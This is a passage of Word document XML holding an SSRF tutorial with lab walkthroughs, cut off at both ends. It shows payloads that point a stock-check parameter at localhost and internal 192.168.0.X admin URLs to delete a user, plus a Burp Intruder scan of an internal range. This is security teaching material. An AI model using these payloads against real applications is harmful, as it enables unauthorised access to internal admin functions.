          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Browse to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> and observe that you can't directly access the admin page.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="586254A2" w14:textId="77777777" w:rsidR="005154F9" w:rsidRPr="00E4142C" w:rsidRDefault="005154F9" w:rsidP="005154F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Visit a product, click "Check stock", intercept the request in Burp Suite, and send it to Burp Repeater.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4F55A224" w14:textId="77777777" w:rsidR="005154F9" w:rsidRPr="00E4142C" w:rsidRDefault="005154F9" w:rsidP="005154F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Change the URL in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>stockApi</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> parameter to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>http://localhost/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>. This should display the administration interface.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233A305F" w14:textId="77777777" w:rsidR="005154F9" w:rsidRPr="00E4142C" w:rsidRDefault="005154F9" w:rsidP="005154F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Read the HTML to identify the URL to delete the target user, which is: </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>http://localhost/admin/delete?username=carlos</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0A5E7891" w14:textId="77777777" w:rsidR="005154F9" w:rsidRPr="00E4142C" w:rsidRDefault="005154F9" w:rsidP="005154F9">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="1"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Submit this URL in the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>stockApi</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> parameter, to deliver the </w:t>
      </w:r>
      <w:hyperlink r:id="rId9" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rStyle w:val="Hyperlink"/>
            <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:color w:val="FF6633"/>
          </w:rPr>
          <w:t>SSRF attack</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="71D889CF" w14:textId="77777777" w:rsidR="009A14A7" w:rsidRPr="00E4142C" w:rsidRDefault="009A14A7" w:rsidP="009A14A7">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Why do applications behave in this way, and implicitly trust requests that come from the local machine? This can arise for various reasons:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B2BB1C1" w14:textId="77777777" w:rsidR="009A14A7" w:rsidRPr="00E4142C" w:rsidRDefault="009A14A7" w:rsidP="009A14A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>The </w:t>
      </w:r>
      <w:hyperlink r:id="rId10" w:history="1">
        <w:r w:rsidRPr="00E4142C">
          <w:rPr>
            <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
            <w:color w:val="FF6633"/>
            <w:u w:val="single"/>
          </w:rPr>
          <w:t>access control</w:t>
        </w:r>
      </w:hyperlink>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t xml:space="preserve"> check might be </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>implemented in a different component</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t xml:space="preserve"> that sits in front of the application server. When a connection is made back to the server itself, the check is bypassed.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="764EEDC9" w14:textId="77777777" w:rsidR="009A14A7" w:rsidRPr="00E4142C" w:rsidRDefault="009A14A7" w:rsidP="009A14A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t xml:space="preserve">For </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>disaster recovery purposes</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>, the application might allow administrative access without logging in, to any user coming from the local machine. This provides a way for an administrator to recover the system in the event they lose their credentials. The assumption here is that only a fully trusted user would be coming directly from the server itself.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4D052C75" w14:textId="77777777" w:rsidR="009A14A7" w:rsidRPr="00E4142C" w:rsidRDefault="009A14A7" w:rsidP="009A14A7">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="2"/>
        </w:numPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t xml:space="preserve">The </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>administrative interface might be listening on a different port number</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t xml:space="preserve"> than the main application, and so might not be reachable directly by users.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="23CFD53E" w14:textId="77777777" w:rsidR="00964325" w:rsidRPr="00E4142C" w:rsidRDefault="00964325" w:rsidP="00964325">
      <w:pPr>
        <w:pStyle w:val="Heading3"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>SSRF attacks against other back-end systems</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7734631E" w14:textId="02D534B1" w:rsidR="00964325" w:rsidRPr="00E4142C" w:rsidRDefault="00964325" w:rsidP="00964325">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where the application server is able to interact with other back-end systems that are not directly reachable by users. These systems often have non-routable private IP addresses. Since the back-end systems are normally protected by the network topology, they often have a weaker security posture. In many cases, internal back-end systems contain sensitive functionality that can be accessed without authentication by anyone who is able to interact with the systems.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2FCB6D8F" w14:textId="77777777" w:rsidR="00964325" w:rsidRPr="00E4142C" w:rsidRDefault="00964325" w:rsidP="00964325">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>In the preceding example, suppose there is an administrative interface at the back-end URL </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>https://192.168.0.68/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>. Here, an attacker can exploit the SSRF vulnerability to access the administrative interface by submitting the following request:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2A36E3F0" w14:textId="77777777" w:rsidR="00964325" w:rsidRPr="00E4142C" w:rsidRDefault="00964325" w:rsidP="00964325">
      <w:pPr>
        <w:pStyle w:val="NormalWeb"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0" w:after="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>POST /product/stock HTTP/1.0</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Content-Type: application/x-www-form-urlencoded</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>Content-Length: 118</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:br/>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>stockApi=http://192.168.0.68/admin</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C96AFF8" w14:textId="77777777" w:rsidR="00964325" w:rsidRPr="00E4142C" w:rsidRDefault="00964325" w:rsidP="00964325">
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:b/>
          <w:bCs/>
          <w:color w:val="FF6633"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
        </w:rPr>
        <w:t>Lab: Basic SSRF against another back-end system</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="26CD6436" w14:textId="77777777" w:rsidR="00964325" w:rsidRPr="00E4142C" w:rsidRDefault="00964325" w:rsidP="00964325">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>This lab has a stock check feature which fetches data from an internal system.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="308A228A" w14:textId="77777777" w:rsidR="00964325" w:rsidRPr="00E4142C" w:rsidRDefault="00964325" w:rsidP="00964325">
      <w:pPr>
        <w:shd w:val="clear" w:color="auto" w:fill="FFFFFF"/>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>To solve the lab, use the stock check functionality to scan the internal </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>192.168.0.X</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> range for an admin interface on port 8080, then use it to delete the user </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>carlos</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:eastAsia="Times New Roman" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="503F30B9" w14:textId="77777777" w:rsidR="00964325" w:rsidRPr="00E4142C" w:rsidRDefault="00964325" w:rsidP="00964325">
      <w:pPr>
        <w:pStyle w:val="Heading4"/>
        <w:shd w:val="clear" w:color="auto" w:fill="EBF0F2"/>
        <w:spacing w:before="0"/>
        <w:textAlignment w:val="center"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Solution</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233D054C" w14:textId="77777777" w:rsidR="00964325" w:rsidRPr="00E4142C" w:rsidRDefault="00964325" w:rsidP="00964325">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:before="100" w:beforeAutospacing="1" w:after="100" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Visit a product, click "Check stock", intercept the request in Burp Suite, and send it to Burp Intruder.</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7700F126" w14:textId="77777777" w:rsidR="00964325" w:rsidRPr="00E4142C" w:rsidRDefault="00964325" w:rsidP="00964325">
      <w:pPr>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="3"/>
        </w:numPr>
        <w:spacing w:beforeAutospacing="1" w:after="0" w:afterAutospacing="1" w:line="240" w:lineRule="auto"/>
        <w:ind w:left="0"/>
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t>Click "Clear §", change the </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>stockApi</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> parameter to </w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rStyle w:val="HTMLCode"/>
          <w:rFonts w:ascii="Tahoma" w:eastAsiaTheme="majorEastAsia" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
          <w:sz w:val="22"/>
          <w:szCs w:val="22"/>
          <w:bdr w:val="none" w:sz="0" w:space="0" w:color="auto" w:frame="1"/>
        </w:rPr>
        <w:t>http://192.168.0.1:8080/admin</w:t>
      </w:r>
      <w:r w:rsidRPr="00E4142C">
        <w:rPr>
          <w:rFonts w:ascii="Tahoma" w:hAnsi="Tahoma" w:cs="Tahoma"/>
          <w:color w:val="333332"/>
        </w:rPr>
        <w:t> then highlight the final octet of the IP address (the number </w:t>
